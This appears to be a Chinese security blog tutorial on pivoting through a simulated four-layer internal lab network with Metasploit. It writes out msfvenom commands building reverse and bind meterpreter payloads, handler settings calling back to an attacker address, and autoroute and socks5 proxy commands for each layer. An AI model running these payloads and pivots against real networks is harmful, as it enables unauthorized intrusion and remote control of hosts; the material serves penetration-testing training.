【Tips+】内网穿透之MSF穿透内网四层网络

admin 2023年10月25日22:39:42评论25 views字数 1533阅读5分6秒阅读模式

【Tips+】内网穿透之MSF穿透内网四层网络

Tips +1

【Tips+】内网穿透之MSF穿透内网四层网络

【Tips+】内网穿透之MSF穿透内网四层网络上一篇我们使用了frp实现多层内网代理穿透,这篇我们使用MSF对内网四层不网络的情况下进行穿透。

模拟靶场简介

如下拓扑图,模拟真实内网多层网络渗透测试。第一层网络centos7出网,其他网络层不出网,下面我们通过msf 后渗透工具对其进行多层内网穿透。

【Tips+】内网穿透之MSF穿透内网四层网络


上线第一层边界主机

【Tips+】内网穿透之MSF穿透内网四层网络

1、使用MSF 马

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.1.23 lport=6666 -f elf -o test1.elf

2、MSF 配置上线参数

use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.23
set lport 6666

【Tips+】内网穿透之MSF穿透内网四层网络

3、上传木马执行上线

【Tips+】内网穿透之MSF穿透内网四层网络

4、添加192.168.22.0网段路由,开启第一个socks5代理转发

方法一:
当前会话的网段 「run get_local_subnets」 获取当前会话的网段
添加路由 「run autoroute -s 192.168.22.0/24」
查看路由是否添加 「run autoroute -p」

方法二:
也可以
通过background回到msf,使用route增加对应路由route add 1192.168.22.0 255.255.255.0 1,1是挂起的session编号。
route print

方法三:
通过msf内置模块自动添加路由
post/multi/manage/autoroute模块,设置session。

【Tips+】内网穿透之MSF穿透内网四层网络

【Tips+】内网穿透之MSF穿透内网四层网络

开启后,我们使用curl 加代理测试一下,代理成功

curl -x socks5://192.168.1.23 http://192.168.22.129

【Tips+】内网穿透之MSF穿透内网四层网络

上线第二层网络主机

1、生成一个正向MSF 马

因为第二层网络不出网,所以我们需要使用正向连接方式让第二层主机上线MSF平台

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=7777 -f elf > test2.elf

2、ssh上传文件到第二层网络主机

scp 本地文件 服务器用户名@服务器IP:服务器上传的目录

【Tips+】内网穿透之MSF穿透内网四层网络

这里我们需要重新开一个msf,然后设置全局socks5 代理

setg proxies socks5:127.0.0.1:1080
setg ReverseAllowProxy true

【Tips+】内网穿透之MSF穿透内网四层网络

【Tips+】内网穿透之MSF穿透内网四层网络

【Tips+】内网穿透之MSF穿透内网四层网络

【Tips+】内网穿透之MSF穿透内网四层网络

同样的操作,添加路由,开启第二层socks5,使其可以访问第三层网络的应用

【Tips+】内网穿透之MSF穿透内网四层网络

【Tips+】内网穿透之MSF穿透内网四层网络

开启第二层代理后,我们客户端配置代理链进行访问

【Tips+】内网穿透之MSF穿透内网四层网络

【Tips+】内网穿透之MSF穿透内网四层网络

上线第三层网络主机

1、第三层网络主机不出网,同样的操作,我们生成正向连接MSF马

msfvenom -p windows/meterpreter/bind_tcp -f exe LPORT=8888 -o test3.exe

【Tips+】内网穿透之MSF穿透内网四层网络

2、接着上传木马执行,成功反弹shell

【Tips+】内网穿透之MSF穿透内网四层网络

【Tips+】内网穿透之MSF穿透内网四层网络

4、继续添加第四层网络的路由,使其能继续渗透第四层网络。

【Tips+】内网穿透之MSF穿透内网四层网络

run post/multi/manage/autoroute 
run autoroute -p

【Tips+】内网穿透之MSF穿透内网四层网络

【Tips+】内网穿透之MSF穿透内网四层网络【Tips+】内网穿透之MSF穿透内网四层网络

上线第四层网络主机

1、第四层网络主机同样不出网,这里我们添加192.168.44.0 网段后可以访问到第四层服务,因此同样生成正向连接MSF马让它上线

msfvenom -p windows/meterpreter/bind_tcp -f exe LPORT=9999 -o test4.exe

【Tips+】内网穿透之MSF穿透内网四层网络

2、设置msf 正向连接参数

【Tips+】内网穿透之MSF穿透内网四层网络

3、上传MSF 马,执行上线

【Tips+】内网穿透之MSF穿透内网四层网络

【Tips+】内网穿透之MSF穿透内网四层网络

到此,我们完成了对四层内网的渗透。【Tips+】内网穿透之MSF穿透内网四层网络


【加入红蓝攻防成长圈,助你快速成长】

【Tips+】内网穿透之MSF穿透内网四层网络

                                        

End


“点赞、在看与分享都是莫大的支持”



【Tips+】内网穿透之MSF穿透内网四层网络


原文始发于微信公众号(贝雷帽SEC):【Tips+】内网穿透之MSF穿透内网四层网络

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月25日22:39:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Tips+】内网穿透之MSF穿透内网四层网络https://cn-sec.com/archives/2144695.html

发表评论

匿名网友 填写信息